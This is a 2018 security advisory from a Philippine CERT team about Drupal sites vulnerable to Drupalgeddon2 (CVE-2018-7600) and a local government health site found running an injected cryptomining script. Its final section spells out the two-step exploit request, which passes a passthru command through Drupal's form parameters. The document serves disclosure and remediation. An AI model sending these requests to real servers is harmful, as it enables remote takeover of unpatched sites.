CSP-CERT® Resources:
Security Advisory Series – Drupalgeddon 2 with Case in Point: Known Health Sector of the LGU Hosting Malware on its pages

by CSP-CERT® Red Team
posted June 2018



MANILA, Philippines - The National Privacy Commission (NPC) have ordered a cease-site operation to certain organizations that have cybersecurity issues.


4 famous food establishments have halted their delivery websites due to orders mandated by the NPC. It is with our current findings that there are 101 Domains that have been detected running under Drupal Content Management System (CMS), 26 Universities Domain, 28 Government Domains and 47 Domains based from the private sector that have been detected as possible vulnerable to access and data leaks.


Overall, we have identified 50% out of the 101 Domains that it is vulnerable to Drupalgeddon2 CVE-2018-7600. Through this vulnerability, this would allow the attacker to take over the whole system just by simply accessing the URL and Inject the publicly Available Exploit Code (See Figure 1 for Diagram Statistics below).


VULNERABILITY INFORMATION


CVE-2018-7600 | Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)


Figure 1: Drupal Usage Detection in Philippine Region

The organization, Cybersecurity Philippines-CERT will notify the website owner to verify and fix the vulnerability as soon as possible.

We have also discovered some of the web applications that it is vulnerable to drupalgeddon2. It was through this that the malicious script on the website was exploited and injected to perform Crypto Mining.


During the discovery of the vulnerability, our security researcher has used only non-intrusive testing techniques that will not affect confidentiality, integrity or availability of the website, any related data or infrastructure. We have notified the website owner in a prompt and reliable manner for the repair and reparation of the vulnerability by following CERT Guidelines for responsible disclosure.


UPDATE AND REMEDIATION


It is recommended that you update your Drupal installation immediately. If you are running 7.x, upgrade to Drupal 7.58. If you are running 8.5.x, upgrade to Drupal 8.5.1.



Security Advisory Series – Case in Point: Known Health Sector of the LGU Hosting Malware on its pages


SECURITY ADVISORY


We received a report from a 3rd party source under the health sector of the local government unit, that it has been hosting malware on its pages. This could indicate that the server has been compromised.


To prevent further exploitation and abuse, this breach requires immediate attention and action by Cyber Security Philippines - CERT.


Please see the following report attached below for the incident information:


As you access the actual website on their Web portal, it will immediately trigger the malware alert from windows defender which indicates that the file on the AppData folder contains a malicious code. Upon examining the path on where the file resides, it can be seen, that the file is from the cache folder of the browser: Mozilla Firefox. This means, that there has been a malicious script executed on the website that has been visited through the browser.


Figure 1: Malicious Detection

To validate the malware found by Windows Defender, the source code of the site has been reviewed. The first 5 lines of the source code clearly indicates that it is an injected script that has been added to all the pages of the website.


Figure 2: Malicious Code Injected on the Source Code

This script is from a web browser mining site, coinhive.com. It utilizes the CPU resources of users that are browsing the site to mine cryptocurrency which is credited to the supplied miners account “PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf“.


The embedded script has been flagged by several anti-malware companies when the URL of the script is supplied to the scan engine of virustotal.com.


Figure 3: Virus Total Detection Result

Further investigation that has been conducted, revealed the possible entry points of the threat agent to the website’s server.


The website’s source code is currently running under Drupal 7, as seen on the annex illustrated below:


Figure 4: Entry Point Vulnerable Drupal Version

The exact version, 7.38 is revealed when visiting a known publicly disclosed file labeled as CHANGELOG.txt


Figure 5: Change Log Information

As viewed on the change log, the site has been currently running from an outdated version of the CMS, and does not have the patch SA-CORE-2018-002 that is dedicated for the newly discovered vulnerability, CVE-2018-7600 – a highly critical vulnerability leading to the remote code execution affecting the following version of Drupal:


• Before 7.58
• 8.x before 8.3.9
• 8.4.x before 8.4.6
• 8.5x before 8.5.1


To prove this concept, Firefox add-on hackbar has been used to craft a “post request” to the vulnerable functions of Drupal.


The exploit is then sent to the url: hxxp://subdomain.website.gov.ph/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=uname+-a with parameters “form_id=user_pass&_triggering_element_name=name” that exploits Drupal’s post render and mark-up functions using php’s passthru function to execute the operating system command: uname – to get the server’s details.)


Figure 6: Vulnerable Parameter

As illustrated on the diagram, the payload is being executed through the crafting of the second post request based on the collection of the hidden form_build_id from the result of the first post request.


Figure 7: Extract form_build_id for payload executionThe form_build_id is then sent to the URL: hxxp://subdomain.website.gov.ph/?q=file/ajax/name/%23value/{form_build_id} using the parameter: form_build_id={form_build_id}

Figure 8: Payload Execution

Based on the diagram, it has been indicated that the server responded with the server’s details from the OS command uname –a and some API details. This may have been the entry point for attackers to download and install backdoors to the server - using it to inject their mining script.